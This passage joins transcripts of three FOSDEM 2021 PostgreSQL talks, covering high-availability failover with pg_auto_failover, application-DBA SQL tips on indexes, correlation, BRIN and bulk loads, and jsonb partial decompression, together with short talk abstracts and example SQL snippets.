C. If A is the primary and you commit a transaction on A, then A will wait until the transaction is known to have been committed on at least B or C, at least one of them by default, before it reports to the client connection that the commit has happened. That's what we mean with sync. Sync means: I'm happy to wait. That's all it means in PostgreSQL streaming replication. We don't have a magic wand to go faster than the speed of light; the speed of light is still a thing, so we need to wait until the event could happen on another system. What's unique in PostgreSQL with this setting is that it applies per transaction. You can have, on the same system, in flight at the same time, transactions that are going to wait and transactions that are not going to wait and be asynchronous. You can even, as on the slide there, have a connection string with a special VIP user for the database that is always going to wait, because it's only doing VIP transactions and you want to make sure those transactions made it to the other servers. Included in PostgreSQL to handle failover and high availability is also online streaming of changes. You can register replication slots in PostgreSQL so that you make sure the primary at all times keeps the data that is necessary for its secondaries to continue streaming. We also have, included in PostgreSQL, tools such as pg_basebackup and pg_rewind that are useful to set up and maintain standbys in a failover system. So you can have changes in roles, and thanks to pg_rewind you can grab the missing WAL and get a node back to following the new primary when that happens. There is also the idea of fast-forward, and PostgreSQL by default includes cascading replication, which allows a standby node to fetch the missing WAL from another standby node.
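The per-transaction waiting described above is controlled with the synchronous_commit setting. A minimal sketch follows, assuming a synchronous standby is already configured via synchronous_standby_names, and that the payments and page_views tables and the vip_user role are placeholders for your own schema:

```sql
BEGIN;
SET LOCAL synchronous_commit = 'on';   -- this transaction waits for a standby
INSERT INTO payments (amount) VALUES (100);
COMMIT;

BEGIN;
SET LOCAL synchronous_commit = 'off';  -- this one does not wait at all
INSERT INTO page_views (url) VALUES ('/home');
COMMIT;

-- Or attach the behaviour to the role used by the "VIP" connection:
ALTER ROLE vip_user SET synchronous_commit = 'on';
```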
PostgreSQL also includes online standby promotion, which is the idea that when the standby is serving read-only queries at the time of the promotion from standby to primary, those queries are left to continue. So there is no stop in the work stream on the standby. That's why it's called a hot standby, and it's referred to on this slide as online standby promotion. Included in PostgreSQL also are the basics of point-in-time recovery. I say the basics because for point-in-time recovery to actually be useful, to actually work, you need an archive, an archive of both base backups and also WAL files. The WAL is the write-ahead log, and it's needed for recovery purposes and also for streaming replication. Archiving is a concept in the PostgreSQL implementation; you need to provide it separately. So please use an existing solution for handling archiving, such as pgBackRest, WAL-E, WAL-G, Barman, or maybe another of those open source solutions that are part of the PostgreSQL ecosystem. Included in PostgreSQL is also client-side HA. On the client side, in your application code, when you connect to PostgreSQL and a failover happens, well, your connection will break. The client will lose its connection, and when the connection is lost it's up to the client to realize that and then connect again. What is provided for in PostgreSQL, what is included, is a connection string facility that allows you to specify many hosts and then have libpq, the client-side library that establishes the connection for you, connect to the one node among the list that is currently the primary, in a way that you can reuse the same connection string again when you lose the connection on the failover and it will reconnect. The discovery of which node is currently the primary, that's included in PostgreSQL: it's the target_session_attrs parameter that you can see in the connection string on the slide there. Now, some of the things that you need are not included in PostgreSQL. The first that I want to list is archiving. Archiving is a concept in PostgreSQL; it's not included directly in PostgreSQL core. Again, use existing open source software that implements archiving for you; I've listed them just previously. With archiving we implement base backups and WAL archiving, like I said before. Also not included in PostgreSQL is this idea that nodes will have a role that changes over time. The currently primary node is going to be a secondary at some point, and one of the secondaries, after a failover, is going to be a primary. That dynamic idea about roles, this idea that roles are dynamic, is not included in PostgreSQL. Some other systems implement Raft or Paxos or other such algorithms that allow them to have dynamic roles in the system. That's not the case for PostgreSQL. Also not included in PostgreSQL is configuration management, extension management and upgrades. Configuration management is the idea that if you change postgresql.conf or pg_hba.conf or some other settings, you need to take care of deploying that change to all the nodes, because otherwise, when you fail over, the changes you just made to the primary are not automatically available on the secondary yet. That's separate tooling that you need to put in place. Extension management is also a little tricky, because when you do create extension, all the SQL objects are going to be replicated on the standby, but the standby still needs to have the operating system part of the extension, the .so, the shared library that is necessary for the extension.
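Two of the pieces above can be shown directly in SQL. This is a hedged sketch: pg_promote() needs PostgreSQL 12 or later, and the archive_command shown is the form the pgBackRest documentation uses (the stanza name "main" is an arbitrary placeholder; each of the archiving tools listed above documents its own command).

```sql
-- On a hot standby: check the role, then promote it without a restart.
SELECT pg_is_in_recovery();   -- true on a standby
SELECT pg_promote();          -- read-only queries keep running during promotion

-- The hooks an archiving tool plugs into (archive_mode needs a restart,
-- archive_command only needs a reload):
ALTER SYSTEM SET archive_mode = 'on';
ALTER SYSTEM SET archive_command = 'pgbackrest --stanza=main archive-push %p';
SELECT pg_reload_conf();
```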
It needs to be installed both on the primary and the secondary servers, and PostgreSQL on the secondary, when it replays the create extension, will not verify for you that the .so is there and available. That's an operating system integration job, and PostgreSQL is not going to do it for you; it's not included. Also upgrades, in the case of a multi-node system: you need to upgrade nodes separately and schedule them, and schedule the restarts and the reconnection of the application yourself. That's the main thing about implementing failover with PostgreSQL. Now, what if we want to automate the operation of a failover entirely? It's possible to do so. There are multiple tools allowing you to do that. I have worked on a tool named pg_auto_failover that I want to present today in this talk. The default, first, simple setup for pg_auto_failover is shown on the slide there. It consists of one primary, one secondary, and what we call the monitor node. The monitor is a third node that allows us to notice network splits and decide if one node is unavailable just because of network issues or because it is completely down. So we can witness that and react correctly to network split situations, thanks to the monitor. In this architecture with a single standby, you can implement automated failover. What you cannot provide with that architecture, as we said before, is both service and data availability. With this architecture you need to choose: either you want to provide the service first, that's what we do, and in that case, when you lose the secondary, you still accept writes on the primary; or you can implement data security, data availability, and then refuse your application the ability to write to the PostgreSQL server when the secondary is down. That's not what we do by default in that case. So it's not proper HA there, it's just failover capacity, but maybe that's what you need. So how do you make it happen? In pg_auto_failover we have a tool named pg_autoctl that is part of the package. So you run pg_autoctl create monitor, and then twice in a row you run pg_autoctl create postgres to create a PostgreSQL instance. The monitor is going to register the instance and decide if it's going to be a primary or a secondary depending on the order in which you type the commands. Basically, the first server is going to be initialized as a primary, and the second one, because the primary already exists, is going to be initialized as a standby, as a secondary node. In pg_auto_failover we name nodes that way: the secondary is a standby that you can promote when the primary fails, basically. So any node could be a standby, but only those standbys that are ready for taking over, failing over from the primary, are named secondaries. So when you already have one standby node, if you want to actually implement HA, maybe you want a second standby node. How do you make it happen? You just type the exact same command again, pg_autoctl create postgres with the same set of arguments, and it's going to register your third node, on a third host or VM or bare-metal machine as you wish, to the monitor, and then give it the role that you expect, and everything is going to be set up for you. Sometimes you want to have three standby nodes, so again, same command. And when we do that, sometimes it's because the third node is going to be a little different from the two previous nodes. It might sit in a remote zone, and it's there only for disaster recovery purposes. You never want to automatically fail over to that node; still, you want it to maintain a copy of the data.
So maybe you want node C in this diagram to not participate in the replication quorum, and to never be a candidate for failover; you want its candidate priority to be zero. The way to make that happen: either you know that at pg_autoctl create postgres time, and then you run the command with the extra arguments that you can see on the slide, --replication-quorum false and --candidate-priority 0; or maybe you didn't know when you installed it the first time, and then you can run the second part of the slide, the two commands pg_autoctl set node replication-quorum and pg_autoctl set node candidate-priority. You can do that online, and you can change your mind many times while the system is running in production, and this is going to apply dynamically to your already running system. So included in PostgreSQL with pg_auto_failover, sorry, included in pg_auto_failover, the same way as in PostgreSQL, is streaming replication with replication slots. The thing that we do that is not the default in PostgreSQL is maintain the replication slots on the standby nodes themselves, so that after a failover everything reconnects smoothly and just continues from where it was. We also include an easy-to-set-up set of SSL certificate facilities, and we include the idea that all the replication settings are dynamic: you can change them online with a very simple command. So included in pg_auto_failover is also the idea that roles are dynamic. A node that is a primary is going to be a secondary if it fails, and a node that is a secondary might become a primary later, so those roles are dynamic in pg_auto_failover. You can also use some of the commands presented on the slide to figure out the current properties of the system. Also included in pg_auto_failover are online membership changes, just like I said before: when a node fails, then something happens and the membership changes, from primary to secondary or secondary to primary, things like that. We also include support for maintenance operations. A node that is undergoing maintenance cannot be a candidate for failover, of course. So you can enable maintenance on a node, do a kernel security upgrade for example, and then when it's back online you can disable maintenance, so this node can be a candidate for failover again when it's back to being ready for that. Included also in pg_auto_failover is network split detection and protection, thanks to the monitor being there in the architecture, and thanks also to some smarts included in the pg_autoctl client itself. pg_autoctl is going to manage the PostgreSQL instance and also check some network properties and make some decisions about the situation. You can even perform a promotion and manually target the node that you want to be the new primary, which might be useful if you're migrating from one data center to another, or if you want to change your current primary's availability zone. That's possible to do with a simple pg_autoctl perform promotion command in pg_auto_failover. Not included yet in pg_auto_failover is archiving and disaster recovery setup. The thing is that in most of the existing archiving and disaster recovery solutions, the idea that roles are dynamic is not implemented. There is a walkthrough in the tutorial or in the documentation to install the solution with a known current primary, and it's hard to figure out what you should do when this primary is going to change, and then to make it automatic. So that's why I believe that we should have something about that in pg_auto_failover itself.
And again, configuration management, extension management, etc.: that is not today part of what pg_auto_failover is going to do on your clusters in production. So that's it. That's the talk. That's my presentation today, PostgreSQL architectures in production. Feel free to ask me questions now, and have a good day. Thank you.
When using PostgreSQL in production it is important to implement a strategy for High Availability. With a database service, the HA properties apply to both the service itself and of course to the data set. In this talk we learn how to think about the specific HA needs of your production environment and how to achieve your requirements with Open Source tooling when it comes to your database of choice, PostgreSQL. In particular, we dive into many options that could be implemented for Postgres to evolve its offering from being a toolset to being “batteries included”. What does that mean in the context of HA? How to achieve it?
10.5446/53280 (DOI)
Hi, good morning. Thank you all for joining me today for my talk about some SQL tricks of an application DBA. My name is Haki Benita. I'm a software developer and a team leader, I'm also a DBA, and I'm a pretty big fan of PostgreSQL. When I first started my career as a professional developer more than a decade ago, I was working for a very large organization, and this organization had a lot of developers and DBAs — so many, in fact, that we had two distinct types of DBAs. We had the infrastructure DBA, who would set up the database and configure storage, replication and backups, and do the occasional instance or database tuning — basically anything related to the operating system. And we also had a type of developer we called an application DBA. This DBA would work closely with the developers, sometimes even with the customers and the management, and would be in charge of schema design — things like tables, indexes and constraints — do a lot of performance tuning, and handle integration with tools like BI and ETL processes, stored procedures and so on. I was an application DBA for most of my career, and in this talk I want to share with you some of the tricks that I picked up along the way in my job as an application DBA. I want to start with one of my favorite misconceptions that I hear a lot as a DBA: that indexes are this magical thing that can make anything faster. Let's look at an example and use a users table. I'm sure most of you have some table that looks like this — it might be called customers or employees. You have an id, an email, and a boolean field called activated that indicates whether the account was activated. If we look at the data, we can see that we have 1 million users and 99% of them activated their account. That's pretty good. At this point one might think: well, we usually work on the activated users, so we must have an index, right? So we create an index on the activated column of the users table and go on with our day. If we then actually query for activated users, we might write a query like that, and we can see that the index is not used: the database decided to use a full table scan — a sequential scan — on the users table. If we try to query for a specific activated user, we can also see that the index is once again not being used; the database uses a sequential scan on the users table. So what's going on? If we try to query for inactivated users, we can see that the index is being used — this time the database decided to use the index. The best way to understand why an index is not always the best plan is to consider an extreme example. In our case, the table size is 65 megabytes and the index is 7 megabytes. If you had to read the entire users table, would you read the index as well? Probably not — why would you? Why read 72 megabytes when 65 is enough? Now, there are additional factors that make a full table scan faster by some degree than reading a table through the index, but let's put those aside for now and concentrate on this example. So you wouldn't use the index to read the entire table, but what about 99%, which was our case? What about 80%, 50%, 40%? There is a certain threshold after which it makes sense to use the index. To decide whether an index scan or a full table scan is best, the database uses a statistic called frequency.
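As an illustration of the setup just described, here is a sketch; the table and column names follow the talk, but the data-generating query is my own:

```sql
-- Hypothetical reconstruction: 1M users, ~99% of them activated
CREATE TABLE users (
    id        bigint GENERATED ALWAYS AS IDENTITY PRIMARY KEY,
    email     text NOT NULL,
    activated boolean NOT NULL
);

INSERT INTO users (email, activated)
SELECT 'user_' || n || '@example.com', random() < 0.99
FROM   generate_series(1, 1000000) AS n;

CREATE INDEX users_activated_ix ON users (activated);
ANALYZE users;

EXPLAIN SELECT * FROM users WHERE activated = true;   -- sequential scan: the common value
EXPLAIN SELECT * FROM users WHERE activated = false;  -- index scan: the rare value
```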
We can see that statistic for our table by querying the pg_stats view for the statistics of the users table and the activated column. After analyzing the table, Postgres found that the activated column contains two distinct values, true and false — which we know is correct. There's also an array of most common values. This would usually hold the actual most common values, but in this case we only have two values, so that's all of them. For every value, Postgres keeps track of the frequency, so Postgres knows that the value true covers 99% of the table and the value false appears in less than 1%. Using this statistic, Postgres knows how to decide whether a full table scan or an index scan is best. Your takeaway from this little section is that when you have columns with high-frequency values, you should probably avoid an index, or at least be very cautious about just adding one, because it might not be used as you expect. Now let's be realistic for a minute and say that we do need to query for inactivated users from time to time — maybe we need to expire them, maybe we want to send a reminder. We already know that Postgres will not use the index to query activated users, so why index them in the first place? This is where partial indexes come in very handy. A partial index allows us to index only part of the table — in this case, only the inactivated users. We already know that activated users will not use the index, so we might as well omit them and index only the inactivated users. There's another slight difference here: because we are only indexing the inactivated users, we index the id column rather than the activated column itself. If we try to query for inactivated users, the index is being used. If we try to query for a specific inactive user, in this case 123, once again the index is used. That's great. Another benefit of partial indexes is their size: because we only index part of the table, the index is much smaller. In this case the full index is 7 megabytes and the partial index is only 230 kilobytes — a significant reduction. I also included the size of the index without deduplication. I'm not going to get into that too much, but there's a new mechanism in Postgres 13 that makes the database use less space for B-tree indexes with a lot of repeating values in the indexed field. So if you are using Postgres 13 with deduplication disabled, or Postgres versions prior to 13, the size you'll see is 21 megabytes, which makes the size reduction even more significant. So you should definitely consider using partial indexes where appropriate. Now, when people ask me what I do, it's not always easy to explain, especially to non-technical people, so I often like to call myself a data plumber, because I feel like I'm connecting pipes and moving data through them. A large, significant part of an application DBA's role is to move data around — whether it's an ETL process, a bulk load, migrations, whatever, we are moving data around. For our next demonstration, let's look at a sample schema of an e-commerce shop. It's pretty standard, you don't have to dig too deep into it: we have a product table, a customer table, and a sale table with the date when the sale was made and two foreign keys to the customer and the product.
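A sketch of the statistics lookup and the partial index discussed above, reusing the hypothetical users table from the previous snippet:

```sql
-- The frequency statistics the planner bases its decision on
SELECT n_distinct, most_common_vals, most_common_freqs
FROM   pg_stats
WHERE  tablename = 'users' AND attname = 'activated';

-- Index only the rare, interesting rows
CREATE INDEX users_unactivated_partial_ix
    ON users (id)
    WHERE activated = false;

-- Compare the footprint of the full and partial indexes
SELECT pg_size_pretty(pg_relation_size('users_activated_ix'))           AS full_index,
       pg_size_pretty(pg_relation_size('users_unactivated_partial_ix')) AS partial_index;
```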
Now, a common task you often need to do is to normalize some fields, maybe as part of a large migration of the data. In this case we want to normalize the emails: we want to make them easier to query and predictable, so we want to make sure they are all lowercase. This could actually be a query you would run as part of a migration — it's not uncommon to see such queries. You issue this query — update the customer table and set the email to lowercase email — and you've just updated more than a million rows, and it took just under two seconds. Now, this type of query, aside from taking two seconds during which it might lock the table, will also create a lot of load. So I made a habit of always making sure that I'm only updating what needs updating. In this example, we really only need to update emails that are not already lowercase. If we add a predicate that excludes all the emails that are already lowercase, we update a lot fewer rows and it's much faster — in fact five times faster — and we create a lot less load. So remember: only update what needs updating. This is very common in bulk updates and data migrations, and in my personal favorite, those quick fixes in production where you just SSH in for a second to update something. Just remember that when you do a large update, you should usually add a WHERE clause somewhere. Let's continue with our example about bulk loads and talk about constraints. Constraints are an amazing feature of relational databases — they are what sets us apart from all those key-value and NoSQL people. They keep the data consistent and reliable, and we should use them; they are great. Here we are adding two foreign key constraints on the sale table, and we also add an index. This was pretty fast, it took 36 milliseconds — the table is empty. Now we can load some data into our sale table: we load 1 million rows, and it takes 15 and a half seconds. Great, right? Now let's do it backwards. This time we load the data into the table first — that takes just under three seconds — and then we add the constraints. This time, adding the constraints took significantly longer, but overall, when we added the constraints and then loaded the data it took 15 and a half seconds, and when we loaded the data and then added the constraints the whole thing took less than three seconds. That's six times faster, and you should consider this when you are loading a lot of data into a table. As far as I know, in PostgreSQL you cannot disable constraints or indexes, so what you usually need to do if you are operating on an existing table is to drop and recreate them. Other RDBMSs provide ways to disable constraints, which is handy especially for cases like this. So let's once again look at loading data into the table. Once again we load data into the sale table, but this time only 100,000 rows — not a lot of data. Now let's try to query this sale table for sales that were made in the first 10 days of May. We can see that the index we have on the date field is being used: the database did a bitmap index scan using the index, and it completed fairly fast. So are we satisfied? Is this enough? Can we call it a day, grab a coffee and be done with it? I think we can do better. Let's see how.
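Before moving on, here are sketches of the two patterns above — updating only what needs updating, and loading first, constraining afterwards. The table layout and the generated data are hypothetical:

```sql
-- Minimal tables for the demo
CREATE TABLE product  (id bigint PRIMARY KEY);
CREATE TABLE customer (id bigint PRIMARY KEY, email text NOT NULL);
INSERT INTO product  VALUES (1);
INSERT INTO customer VALUES (1, 'Some.One@Example.com');

-- 1. Only touch rows that actually change
UPDATE customer
SET    email = lower(email)
WHERE  email <> lower(email);

-- 2. Bulk load: create the bare table, load, then add constraints and indexes
CREATE TABLE sale (
    id          bigint GENERATED ALWAYS AS IDENTITY PRIMARY KEY,
    created     timestamptz NOT NULL,
    product_id  bigint NOT NULL,
    customer_id bigint NOT NULL
);

INSERT INTO sale (created, product_id, customer_id)          -- load first...
SELECT timestamptz '2021-01-01' + (random() * 365 || ' days')::interval, 1, 1
FROM   generate_series(1, 1000000) AS n;

ALTER TABLE sale ADD FOREIGN KEY (product_id)  REFERENCES product;   -- ...constrain after
ALTER TABLE sale ADD FOREIGN KEY (customer_id) REFERENCES customer;
CREATE INDEX sale_created_ix ON sale (created);
```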
To understand how we can do better, we need to mention another important statistic the database uses to determine which execution plan — which access method — to use, and that's correlation. Correlation, according to the documentation, is the statistical correlation between the physical ordering and the logical ordering of the column values. To understand this, we're going to use these two illustrations. On the left you can see the index, which is always sorted, and these are the table blocks. When the correlation is one — perfect correlation — consecutive values of the indexed column are stored physically in adjacent pages. If this leaf here is one, it's in the leftmost block of the table; the next value, two, is in the next block, then three and four — the data is perfectly sorted on disk. When the correlation is close to zero, consecutive values are scattered all across the table; they are not ordered as nicely as when the correlation was one. To get an intuition for correlation, note that some types of columns have a natural high correlation. One example is auto-incrementing IDs: when you generate IDs from a sequence, new rows are appended at the end of the table with automatically increasing values, so they are naturally sorted on disk. Timestamps that record when the row was created or modified also tend to be naturally correlated with the physical order of the table. We can inspect this statistic for our columns, once again from the pg_stats view. We query the correlation for the sale table for the id and created columns, and we can see that our auto-incrementing id field has perfect correlation, as we just described, while the creation date has very low correlation, very close to zero. This means that consecutive values of the creation date are scattered all across the table. To try and improve the correlation and see how it affects performance, we can load the data into the table again, but this time sorted by the creation date, so that it is physically ordered on disk. Then we execute the exact same query to find the sales from the first 10 days of May, and we can see two things. First, the execution plan is much simpler: before, we got a bitmap scan, and now the database decided to use a plain index scan. Second, the execution time is much faster — actually three times faster than before. The reason is the correlation. Before, when the correlation was very low, the database looked at the correlation and assumed that rows within these first 10 days of May are probably scattered all across the table, so it figured it would be best to scan the index, find the pages where these values might be, then read those pages and look for matching rows. With perfect correlation, the database figured that a lot of these values most likely sit very close to each other on disk — maybe there are even several matching rows inside the same block.
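A sketch of checking the correlation statistic and of reloading a table in sorted order, reusing the hypothetical sale table from the previous snippet:

```sql
ANALYZE sale;

-- Correlation of physical vs logical ordering, per column
SELECT attname, correlation
FROM   pg_stats
WHERE  tablename = 'sale' AND attname IN ('id', 'created');

-- Reload the data ordered by the column the range queries filter on
CREATE TABLE sale_sorted (LIKE sale INCLUDING ALL);
INSERT INTO sale_sorted (created, product_id, customer_id)
SELECT created, product_id, customer_id FROM sale ORDER BY created;
ANALYZE sale_sorted;

-- With correlation close to 1 the planner can switch to a plain index scan
EXPLAIN ANALYZE
SELECT * FROM sale_sorted
WHERE  created BETWEEN '2021-05-01' AND '2021-05-11';
```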
With perfect correlation, the database just iterates over the index, and when it finds a match it reads the block — and it's very likely that the next value is in that block or the next one. To compare: when we had low correlation, the access method was a bitmap index scan, and it was three times slower than the index scan we got when the correlation was perfect. So the takeaway here is that when you populate a table, you should think about how it's going to be used, and perhaps sort the data in a way that benefits the queries. Another way of sorting a table on disk, if you have already populated it, is the CLUSTER command. Keep in mind that it's a blocking operation and that it might affect the correlation of other columns in the table. I usually don't use CLUSTER in production unless I know I can allow myself some downtime. Now, we can't talk about correlation without mentioning one of my favorite types of index: the block range index, BRIN. If you read the definition, it mentions many of the terms we used to describe correlation: BRIN is designed for handling very large tables where certain columns have a natural correlation with their physical location within the table. To understand how BRIN works, let's do an example. Say we have these values, each in a single table page. What BRIN does is take each three adjacent pages and group them into a range, and then for each range it keeps only the range of the values inside that group. So one, two, three are the first group, four, five, six the second, and seven, eight, nine the third, and for each group it keeps only the minimum and the maximum: the first group contains values from one to three, and so on. Let's try to use this index to find the value five. The first range holds values from one to three, so five is definitely not there — no point in even looking at those blocks. The second group holds values between four and six, so five might be there. Notice that I didn't say it's definitely there, only that it might be. And finally, seven through nine: five is definitely not there. So using the index we were able to narrow the search down to just blocks four through six. Now let's see how important correlation is for the performance of a BRIN index. If we have the exact same data but this time with very low correlation — meaning the data is not sorted on disk — we do the same: group the pages into three ranges of three adjacent blocks and keep the min and max for each. Now let's try to use this index to find the value five like we did before. This time the index is useless: we can't narrow the search at all, because each of these ranges could contain the value five. That's how correlation affects a BRIN index. To create a BRIN index, you use the USING brin clause of CREATE INDEX. And if you really want to experiment with BRIN indexes, I highly recommend looking at the storage parameter called pages_per_range. In our example the pages per range was three, because we grouped three adjacent blocks into a range; the default is 128, and this parameter affects the performance of BRIN very much, so you should experiment with different values. And the best part of BRIN indexes: they are very, very small. The corresponding B-tree index on the same field would have been 2 megabytes in size, and the BRIN index is just 48 kilobytes. So, we are almost done — I don't have much time left.
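A minimal sketch of creating a BRIN index with a non-default pages_per_range and comparing its size with the B-tree index from the earlier snippets:

```sql
-- BRIN shines when the indexed column correlates with the physical row order
CREATE INDEX sale_sorted_created_brin_ix
    ON sale_sorted USING brin (created)
    WITH (pages_per_range = 32);        -- default is 128; worth experimenting

SELECT pg_size_pretty(pg_relation_size('sale_sorted_created_brin_ix')) AS brin_size,
       pg_size_pretty(pg_relation_size('sale_created_ix'))             AS btree_size;
```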
I want to go through three more nice, quick tips for database development. The first one is unlogged tables. Postgres has a mechanism called WAL — the write-ahead log. It's used to keep track of changes for integrity, to roll forward during recovery, and for replication, but it has a certain overhead, and there are situations where you can skip it to make things faster. One such scenario is what I like to call intermediate tables: the disposable, temporary kind of tables you create while implementing something else. This is very common in data warehouses, where you load data from external sources into a staging area and then manipulate it before loading it into the actual tables. In this case, the intermediate tables in the staging area can benefit from being unlogged, meaning they will not be replicated and will not be restored in case of a crash, but they will be a bit faster to work with. So use unlogged carefully, but you can gain some speedups with it. The second tip is what I like to call invisible indexes. Coming from Oracle, I had all sorts of features like optimizer hints and a way to actually mark indexes as invisible. In Postgres you don't have these features, but there are situations where I'm playing with an execution plan and want to see what it might look like without a certain index. One way to achieve that, without actually dropping the index, is to do it inside a transaction. This uses the fact that Postgres implements what's called transactional DDL: you start a transaction, drop the index — and the index is not really dropped until you commit the transaction — then you run your EXPLAIN, see what the plan looks like, and when you roll back, nothing happened. This is what I call invisible indexes. And finally, when you need to schedule a long-running process, it's only natural to pick a round hour. Knowing that everybody else does the same, you can benefit from scheduling long-running processes at odd hours: instead of scheduling things at 2am or 4am sharp, try scheduling something at 2:35 and 17 seconds. You have a better chance of finding the system at rest, and maybe your process will run slightly faster because of that. So this is it — I don't have any time left. You can check out my blog, where I write a lot about performance, SQL, Postgres and Python web development as well. I'm pretty active on Twitter, and you can subscribe to my mailing list — I try to send something out about once a month. You can also send me an email with your thoughts and corrections about this talk or anything else. Thank you very much for listening, and hopefully you learned something new. Bye.
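For reference, sketches of two of the quick tips above — an unlogged staging table and the transactional "invisible index" trick — again using the hypothetical objects from the earlier snippets:

```sql
-- 1. Unlogged staging table: faster to write, but not crash-safe and not replicated
CREATE UNLOGGED TABLE staging_sale (LIKE sale INCLUDING DEFAULTS);

-- 2. "Invisible index": preview a plan without an index, thanks to transactional DDL
BEGIN;
DROP INDEX sale_created_ix;
EXPLAIN SELECT * FROM sale WHERE created >= '2021-05-01';
ROLLBACK;   -- nothing happened, the index is still there
```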
Databases are the backbone of most modern systems, and taking some time to understand how they work is a good investment for any developer! In this talk I share some non-trivial tips about database development. Rules of thumb have been passed on from DBA to DBA for many years; some of these rules may seem weird while others make perfect sense. In this talk I present some of the "rules" I accumulated over the years, such as why you should always load sorted data into tables, how to make indexes invisible, and why you should always schedule long running processes at odd hours...
10.5446/53282 (DOI)
Hello. I am happy to talk at the FOSDEM 2021 online conference, in the PostgreSQL devroom, and today I will talk about what to do to speed up jsonb. First, a quick summary for those who don't have much time. Jsonb is very popular and is constantly developing; I refer here to two recent talks about the jsonb roadmap — the latest was at Postgres Build — which you can download to get more background for this talk. We believe we need to improve the performance of jsonb: we want to investigate and optimize access to keys and metadata for non-toasted and toasted jsonb. We mostly want to optimize a very popular pattern of using jsonb in Postgres, where you have comparatively small metadata plus some big, long keys, and the metadata is what is accessed most often. We demonstrate, step by step, how we could improve the performance of jsonb, and we get significant speedups — orders of magnitude. These are our repositories for jsonb partial decompression and jsonb partial detoast; you can also download the slides and the video of this talk, and here are our contacts — if you want to collaborate with us and help with this project, you are welcome. Let's consider a synthetic test to get some motivation for this work. The table contains 100 jsonb values of different sizes, from 100 bytes to 10 megabytes, which compress to 20 kilobytes. Here is how the jsonb looks: comparatively small metadata keys key1, key2, key4 and key5, and in the middle a very long key3, whose size changes from row to row up to the maximum of 10 megabytes. We measure the execution time of the arrow operator for each row by repeating it 100,000 times in the query — so we measure not the read time, but just the time of the arrow operator itself. For this synthetic test, on the left you see the execution time of the arrow operator versus the raw jsonb size on master, and on the right how many blocks are read by the arrow operator. You can see the dashed lines: about 100 kilobytes is the limit for inline rows, and slightly more than 100 kilobytes is the limit for compressed inline rows. We see three areas. The first is the area of inline rows, where performance is the same for the different keys, because there is no decompression and no additional blocks need to be read from TOAST. The second is roughly linear: these rows are also stored inline, but after compression, and the limit is slightly more than 100 kilobytes. Then come the toasted rows, and there the difference in execution time can be around three orders of magnitude — if you have long keys, a long jsonb, access time can be very big. For blocks read, we see that for inline and compressed inline rows the count is zero, because the arrow operator doesn't need to read additional blocks, while for toasted rows many additional blocks must be read. If we show the results on a compressed axis — the compressed jsonb size — the blocks picture is the same, and the performance plot looks a bit strange at first glance, but that part is actually the inline-stored compressed rows, and performance decreases because of decompression.
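A rough sketch of the kind of synthetic setup and measurement described above; the sizes, key names and queries here are only illustrative — the actual benchmarks and patches live in the repositories mentioned in the talk:

```sql
-- A small jsonb with short keys and one long key whose size varies per row
CREATE TABLE test_jsonb AS
SELECT jsonb_build_object(
           'key1', i,
           'key2', 'short value',
           'key3', repeat('x', i * 1000),   -- the long value in the middle
           'key4', i,
           'key5', 'another short value'
       ) AS js
FROM generate_series(1, 100) AS i;

-- Timing the arrow operator itself (for example with \timing in psql):
SELECT js -> 'key1' FROM test_jsonb;   -- a short key near the start
SELECT js -> 'key5' FROM test_jsonb;   -- a short key stored after the long key3

-- Where do the values end up? Compare textual size with on-disk (possibly compressed) size:
SELECT octet_length(js::text) AS raw_size, pg_column_size(js) AS stored_size
FROM   test_jsonb
ORDER  BY raw_size DESC
LIMIT  5;
```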
The most important overhead, then, is the decompression of the whole jsonb. Now let's consider a real-world example. We took the IMDB database — you can download it to play with. Each jsonb looks like this: there are many rare fields, but only id and imdb_id are mandatory, and roles is an array, the biggest and most frequent field. On the slide you see the distribution of sizes of the various keys and of the compressed jsonb; some tuples are quite long, about one megabyte. We have id, roles, height and imdb_id — these are the four keys we are interested in; the others are quite rare and we will not test them. The results are shown on this slide: the same picture as in the synthetic test, but now it's a mixture of different sizes. We run each query 1000 times, and here you see the distribution of execution times, again for the arrow operator. The points of different colors are just mixed — some are slow, some fast, some moderate. On the right you see the stored size versus the raw jsonb size: red is inline storage, as expected, green is inline but compressed, and blue is toasted. From these results we see that decompression of the whole jsonb is the biggest problem: this overhead limits the applicability of jsonb as a document storage with partial access. This is very important, because if you read the document as a whole you don't have such a big problem, but partial access is limited. So we need to consider optimizations like partial decompression. TOAST also introduces additional overhead, because the process needs to read too many blocks, so again we need to optimize this and read only the needed blocks — this is called partial detoast. TOAST is the technique Postgres uses to work with long tuples that don't fit into two kilobytes: TOAST compresses the tuple and splits it into chunks, which are stored in a different relation. So when you access attributes that are stored in TOAST, you have to do a sort of join between the original heap table and the TOAST table, and we understand this is maybe not very efficient. The TOAST pointer doesn't refer to the chunks directly, so we need an index, and we have to read four or even five additional blocks — that is the overhead of TOAST access. Our plan to improve jsonb detoasting is the following. First, we consider partial pglz decompression. Then we order the key values in jsonb so that short keys are placed at the beginning and long keys at the end. Then we consider partial detoast using TOAST iterators, reading chunk by chunk, as much as we need. And the last one is inline TOAST, where we store as much as possible of the first chunk inline, so that if we access an attribute that can be found in that inline part of the first chunk, we don't need to detoast at all. This is the last optimization we'll discuss today; the others are our ideas for the future. So let's consider partial decompression. Partial decompression eliminates the overhead of decompressing — and therefore reading — the whole jsonb. On the left side you see full decompression, used to access key1 and key5.
The time is practically the same for both, because you read the whole jsonb, decompress it, and then do the search and extract the value. On the right side is partial decompression: access to key1 becomes much faster, because we don't need to decompress the whole jsonb, but access to key5 is still slow, because you first have to decompress the long values of key3 and key4. Next, here is an example of the results for partial decompression: master on the left, partial pglz decompression on the right. The picture has changed: access to K1 and K2 is significantly sped up, and for inline compressed jsonb their access time is now constant. For long jsonb — longer than about one megabyte — the acceleration can be orders of magnitude; here we have more than 100 times. This is again the area of inline compressed rows, and this the area of toasted jsonb, and you can see that the K1 and K2 points, the red and orange ones, just jumped down from the old line — that's partial decompression. But K4 and K5 are still slow: they sit after the very long key3, so we need to eliminate that next. We applied the same optimization to the IMDB dataset, and the results are more or less the same as for the synthetic test — it just looks a bit nicer: access time to the first keys, id and height (the blue and yellow points), becomes much lower, while the big roles key (green) and the short imdb_id, which is placed after roles, are mostly unchanged. Then we had another idea: sort the jsonb keys by the length of their values. You know that in the original jsonb format, object keys are sorted by length and name, so keys with longer or alphabetically greater names are placed at the end, and there is no way for them to benefit from partial decompression. What if we sort by value length? Then we get fast decompression for the shortest keys: V5 moves to the beginning and V3 to the end. Here you see the original ordering and the new ordering: K4 and K5 are now placed before K3, which means we no longer need to decompress the whole jsonb to reach them. And indeed, access to all the short keys — excluding K3, which is now at the end — is significantly sped up: on the right side only the green points remain high, all the other 